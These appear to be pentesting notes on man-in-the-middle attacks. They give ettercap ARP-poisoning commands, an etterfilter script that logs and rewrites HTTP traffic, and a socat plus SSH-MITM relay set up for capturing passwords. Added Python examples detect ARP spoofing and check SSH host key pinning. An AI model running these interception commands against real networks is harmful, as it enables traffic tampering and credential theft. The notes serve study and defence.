# Man In the Middle
## Ettercap
* [Ettercap](https://www.ettercap-project.org/)
* [Bettercap](https://www.bettercap.org/)
* ARP spoofing via ettercap to read traffic. Press `q` to quit and restore the pre-MITM ARP caches.

```sh
# -T text interface, -i capture interface, -M arp selects the ARP-poisoning MITM mode
ettercap -T -i <interface> -M arp
```
* Etterfilter can filter and restructure packets

```sh
man etterfilter
```

```
if (ip.proto == TCP && tcp.dst == 80 && search(DATA.data, "filename.html")) {
    log(DATA.data, "/tmp/ettercap.log");
    replace("filename.html", "otherfilename.html");
    msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n");
}
```
* Escape double quotes inside the payload string (`\"`)

* compile via

```sh
# the input is the plain-text filter script; -o names the compiled binary filter ettercap loads
etterfilter filter.filter -o filter.ef
```
* Run the filter via

```sh
ettercap -T -i <interface> -M arp -F filter.ef
```
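ARP poisoning of the kind `ettercap -M arp` performs leaves a visible trace on the wire: an IP that was bound to one MAC is suddenly answered for by another, and the attacker's MAC ends up claiming both the gateway and the victim. The following detector is an added example written for these notes; it is not part of the original page or of the Ettercap project. It runs over constructed tcpdump-style ARP reply lines (the line format, the addresses and the optional `trusted` table are all assumptions) and returns alerts for rebinding and for one MAC claiming several IPs.

```python
"""Detect ARP cache poisoning from observed ARP replies (added example, constructed data)."""
import re
from collections import defaultdict

# Constructed sample in tcpdump "-e" style; the last two lines show a third MAC
# answering for both the gateway (192.168.1.1) and a host (192.168.1.10).
SAMPLE_ARP_LOG = """\
10:00:01 aa:bb:cc:00:00:01 > ff:ff:ff:ff:ff:ff, ARP, Reply 192.168.1.1 is-at aa:bb:cc:00:00:01
10:00:02 aa:bb:cc:00:00:10 > aa:bb:cc:00:00:01, ARP, Reply 192.168.1.10 is-at aa:bb:cc:00:00:10
10:00:05 de:ad:be:ef:00:99 > aa:bb:cc:00:00:10, ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:99
10:00:05 de:ad:be:ef:00:99 > aa:bb:cc:00:00:01, ARP, Reply 192.168.1.10 is-at de:ad:be:ef:00:99
"""

ARP_REPLY = re.compile(r"Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-f:]{17})", re.I)


def parse_arp_replies(text):
    """Yield (ip, mac) pairs from tcpdump-style ARP reply lines; other lines are ignored."""
    for line in text.splitlines():
        m = ARP_REPLY.search(line)
        if m:
            yield m.group(1), m.group(2).lower()


def detect_arp_spoofing(text, trusted=None):
    """Return a list of alert strings for the ARP replies in `text`.

    `trusted` is an optional {ip: mac} table of known-good bindings (for example a
    static entry for the gateway). Without it, the first binding seen for an IP is
    taken as the baseline, so the detector should be started before any poisoning.
    """
    bindings = dict(trusted or {})      # ip -> mac we believe is legitimate
    ips_per_mac = defaultdict(set)      # mac -> set of IPs it has claimed
    alerts = []
    for ip, mac in parse_arp_replies(text):
        if ip in bindings and bindings[ip] != mac:
            # Rebinding of a known IP: the classic poisoning signature.
            alerts.append(f"{ip} changed from {bindings[ip]} to {mac}")
        else:
            bindings.setdefault(ip, mac)
        claimed = ips_per_mac[mac]
        if ip not in claimed:
            claimed.add(ip)
            if len(claimed) > 1:
                # One interface answering for several hosts: a relay sitting in the middle.
                alerts.append(f"{mac} claims multiple IPs: {sorted(claimed)}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_ARP_LOG):
        print("ALERT:", alert)
```

In practice the lines would come from `tcpdump -e -n arp` piped into the script, or the bindings from a periodic `arp -a`; a static ARP entry for the gateway (passed as `trusted`) is the cheapest mitigation on the hosts that matter.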
## mitm-server

Set up a local man-in-the-middle SSH server, which can be used, for example, for password looting when somebody logs in through it.

[SSH-MITM](https://docs.ssh-mitm.at/#) provides this feature; install the package via `pip install ssh-mitm`.

Redirect the port to the MITM server, then start it:

```sh
# forward connections arriving on 2222 to the ssh-mitm listener (10022 by default), detached from the shell;
# without ",fork" on the LISTEN address socat serves a single connection and then exits
((socat TCP4-LISTEN:2222 TCP4:10.10.14.4:10022 &) &)

ssh-mitm server --remote-host $TARGET_IP
```
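The reason an SSH MITM server is caught by a careful client is host key pinning: the relay cannot sign with the real server's private key, so the host key it presents differs from the one recorded in `known_hosts`, and `StrictHostKeyChecking=yes` refuses the connection. The stdlib-only check below is an added example, not code from the original notes or from the SSH-MITM project. It builds two constructed ssh-ed25519 key blobs (the "real" host key and the one a relay would present), a constructed plain-text `known_hosts` line for an assumed host `10.10.10.5`, computes OpenSSH-style `SHA256:` fingerprints, and classifies a presented key as `ok`, `unknown` (first contact) or `mismatch`.

```python
"""Host key pinning check in the style of StrictHostKeyChecking (added example, constructed keys)."""
import base64
import hashlib


def ssh_string(b: bytes) -> bytes:
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return len(b).to_bytes(4, "big") + b


def build_ed25519_blob(raw32: bytes) -> bytes:
    """Public key blob as it appears base64-encoded in known_hosts: type name + 32 raw key bytes."""
    assert len(raw32) == 32
    return ssh_string(b"ssh-ed25519") + ssh_string(raw32)


def fingerprint_sha256(blob: bytes) -> str:
    """OpenSSH-style fingerprint: 'SHA256:' + unpadded base64 of SHA-256 over the key blob."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


# Constructed keys: the genuine server key and the key a relay in the middle would present.
REAL_KEY = build_ed25519_blob(bytes(range(32)))
MITM_KEY = build_ed25519_blob(bytes(range(32, 64)))

# Constructed known_hosts entry recorded on first contact with the genuine host (assumed address).
KNOWN_HOSTS = "10.10.10.5 ssh-ed25519 " + base64.b64encode(REAL_KEY).decode() + "\n"


def parse_known_hosts(text: str) -> dict:
    """Return {host: (keytype, blob)} from plain (unhashed) known_hosts lines.

    Entries may list several comma-separated hosts; a non-standard port appears as
    "[host]:port" and is kept verbatim as the lookup key.
    """
    table = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        hosts, keytype, b64 = line.split()[:3]
        for host in hosts.split(","):
            table[host] = (keytype, base64.b64decode(b64))
    return table


def verify_host_key(known_hosts: str, host: str, keytype: str, blob: bytes) -> str:
    """'ok' if the presented key matches the pinned one, 'unknown' on first contact, else 'mismatch'."""
    entry = parse_known_hosts(known_hosts).get(host)
    if entry is None:
        return "unknown"
    if entry == (keytype, blob):
        return "ok"
    return "mismatch"


if __name__ == "__main__":
    print("pinned  :", fingerprint_sha256(REAL_KEY))
    print("presented:", fingerprint_sha256(MITM_KEY))
    print(verify_host_key(KNOWN_HOSTS, "10.10.10.5", "ssh-ed25519", MITM_KEY))
```

The `unknown` case is the one the relay relies on: with the default `StrictHostKeyChecking=ask` a user who answers "yes" on first contact pins the relay's key instead of the server's. Distributing host keys out of band (or via SSH CA certificates) removes that first-contact gap.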